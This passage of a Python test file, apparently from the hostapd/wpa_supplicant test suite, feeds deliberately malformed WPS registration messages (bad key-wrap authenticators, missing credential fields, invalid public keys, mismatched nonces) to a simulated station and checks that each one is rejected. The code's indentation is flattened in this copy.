logger.debug("Send WSC_Done to AP")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
send_wsc_msg(hapd, addr, wsc_done)
ev = hapd.wait_event(["WPS-REG-SUCCESS"], timeout=5)
if ev is None:
raise Exception("hostapd did not report WPS success")
dev[0].wait_connected()
def wps_start_kwa(dev, apdev):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
return r_s1, keywrapkey, authkey, raw_m3_attrs, eap_id, bssid, attrs
def wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id):
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_kwa_proto_no_kwa(dev, apdev):
"""WPS and KWA error: No KWA attribute"""
r_s1,keywrapkey,authkey,raw_m3_attrs,eap_id,bssid,attrs = wps_start_kwa(dev, apdev)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
# Encrypted Settings without KWA
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id)
def test_wps_ext_kwa_proto_data_after_kwa(dev, apdev):
"""WPS and KWA error: Data after KWA"""
r_s1,keywrapkey,authkey,raw_m3_attrs,eap_id,bssid,attrs = wps_start_kwa(dev, apdev)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
# Encrypted Settings and data after KWA
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
data += build_wsc_attr(ATTR_VENDOR_EXT, "1234567890")
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id)
def test_wps_ext_kwa_proto_kwa_mismatch(dev, apdev):
"""WPS and KWA error: KWA mismatch"""
r_s1,keywrapkey,authkey,raw_m3_attrs,eap_id,bssid,attrs = wps_start_kwa(dev, apdev)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
# Encrypted Settings and KWA with incorrect value
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, 8*'\x00')
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id)
def wps_run_cred_proto(dev, apdev, m8_cred, connect=False, no_connect=False):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m5_attrs, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 from STA")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M7)
logger.debug("Send M8 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_attr_encr_settings(authkey, keywrapkey, m8_cred)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m8)
eap_id = (eap_id + 1) % 256
if no_connect:
logger.debug("Receive WSC_Done from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_Done or msg['wsc_msg_type'] != WPS_WSC_DONE:
raise Exception("Unexpected Op-Code/MsgType for WSC_Done")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
elif connect:
logger.debug("Receive WSC_Done from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_Done or msg['wsc_msg_type'] != WPS_WSC_DONE:
raise Exception("Unexpected Op-Code/MsgType for WSC_Done")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_connected()
else:
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def build_cred(nw_idx='\x01', ssid='test-wps-conf', auth_type='\x00\x20',
encr_type='\x00\x08', nw_key="12345678",
mac_addr='\x00\x00\x00\x00\x00\x00'):
attrs = b''
if nw_idx is not None:
attrs += build_wsc_attr(ATTR_NETWORK_INDEX, nw_idx)
if ssid is not None:
attrs += build_wsc_attr(ATTR_SSID, ssid)
if auth_type is not None:
attrs += build_wsc_attr(ATTR_AUTH_TYPE, auth_type)
if encr_type is not None:
attrs += build_wsc_attr(ATTR_ENCR_TYPE, encr_type)
if nw_key is not None:
attrs += build_wsc_attr(ATTR_NETWORK_KEY, nw_key)
if mac_addr is not None:
attrs += build_wsc_attr(ATTR_MAC_ADDR, mac_addr)
return build_wsc_attr(ATTR_CRED, attrs)
def test_wps_ext_cred_proto_success(dev, apdev):
"""WPS and Credential: success"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr)
wps_run_cred_proto(dev, apdev, m8_cred, connect=True)
def test_wps_ext_cred_proto_mac_addr_mismatch(dev, apdev):
"""WPS and Credential: MAC Address mismatch"""
m8_cred = build_cred()
wps_run_cred_proto(dev, apdev, m8_cred, connect=True)
def test_wps_ext_cred_proto_zero_padding(dev, apdev):
"""WPS and Credential: zeropadded attributes"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, ssid='test-wps-conf\x00',
nw_key="12345678\x00")
wps_run_cred_proto(dev, apdev, m8_cred, connect=True)
def test_wps_ext_cred_proto_ssid_missing(dev, apdev):
"""WPS and Credential: SSID missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, ssid=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_ssid_zero_len(dev, apdev):
"""WPS and Credential: Zero-length SSID"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, ssid="")
wps_run_cred_proto(dev, apdev, m8_cred, no_connect=True)
def test_wps_ext_cred_proto_auth_type_missing(dev, apdev):
"""WPS and Credential: Auth Type missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, auth_type=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_encr_type_missing(dev, apdev):
"""WPS and Credential: Encr Type missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, encr_type=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_network_key_missing(dev, apdev):
"""WPS and Credential: Network Key missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, nw_key=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_network_key_missing_open(dev, apdev):
"""WPS and Credential: Network Key missing (open)"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, auth_type='\x00\x01',
encr_type='\x00\x01', nw_key=None, ssid="foo")
wps_run_cred_proto(dev, apdev, m8_cred, no_connect=True)
def test_wps_ext_cred_proto_mac_addr_missing(dev, apdev):
"""WPS and Credential: MAC Address missing"""
m8_cred = build_cred(mac_addr=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_invalid_encr_type(dev, apdev):
"""WPS and Credential: Invalid Encr Type"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, encr_type='\x00\x00')
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_missing_cred(dev, apdev):
"""WPS and Credential: Missing Credential"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = b''
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_proto_m2_no_public_key(dev, apdev):
"""WPS and no Public Key in M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, None)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m2_invalid_public_key(dev, apdev):
"""WPS and invalid Public Key in M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, 192*b'\xff')
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m2_public_key_oom(dev, apdev):
"""WPS and Public Key OOM in M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
with alloc_fail(dev[0], 1, "wpabuf_alloc_copy;wps_process_pubkey"):
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_nack_m3(dev, apdev):
"""WPS and NACK M3"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, config_error='\x01\x23')
send_wsc_msg(dev[0], bssid, msg)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("Failure not reported")
if "msg=7 config_error=291" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_wps_ext_proto_nack_m5(dev, apdev):
"""WPS and NACK M5"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, config_error='\x01\x24')
send_wsc_msg(dev[0], bssid, msg)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("Failure not reported")
if "msg=9 config_error=292" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def wps_nack_m3(dev, apdev):
pin = "00000000"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk, dev_pw_id='\x00\x04')
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
return eap_id, m1_attrs[ATTR_ENROLLEE_NONCE], r_nonce, bssid
def test_wps_ext_proto_nack_m3_no_config_error(dev, apdev):
"""WPS and NACK M3 missing Config Error"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, r_nonce, config_error=None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_no_e_nonce(dev, apdev):
"""WPS and NACK M3 missing E-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, None, r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_e_nonce_mismatch(dev, apdev):
"""WPS and NACK M3 E-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, 16*'\x00', r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_no_r_nonce(dev, apdev):
"""WPS and NACK M3 missing R-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_r_nonce_mismatch(dev, apdev):
"""WPS and NACK M3 R-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, 16*'\x00')
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_no_msg_type(dev, apdev):
"""WPS and NACK M3 no Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, r_nonce, msg_type=None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_invalid_msg_type(dev, apdev):
"""WPS and NACK M3 invalid Message Type"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_nack(eap_id, e_nonce, r_nonce, msg_type=123)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_nack_m3_invalid_attr(dev, apdev):
"""WPS and NACK M3 invalid attribute"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
attrs = b'\x10\x10\x00'
msg = build_eap_wsc(1, eap_id, attrs, opcode=WSC_NACK)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_no_e_nonce(dev, apdev):
"""WPS and ACK M3 missing E-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_ack(eap_id, None, r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_e_nonce_mismatch(dev, apdev):
"""WPS and ACK M3 E-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_ack(eap_id, 16*'\x00', r_nonce)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_no_r_nonce(dev, apdev):
"""WPS and ACK M3 missing R-Nonce"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, None)
send_wsc_msg(dev[0], bssid, msg)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_wps_ext_proto_ack_m3_r_nonce_mismatch(dev, apdev):
"""WPS and ACK M3 R-Nonce mismatch"""
eap_id, e_nonce, r_nonce, bssid = wps_nack_m3(dev, apdev)
logger.debug("Send NACK to STA")
msg, attrs = build_ack(eap_id, e_nonce, 16*'\x00')
send_wsc_msg(dev[0], bssid, msg)
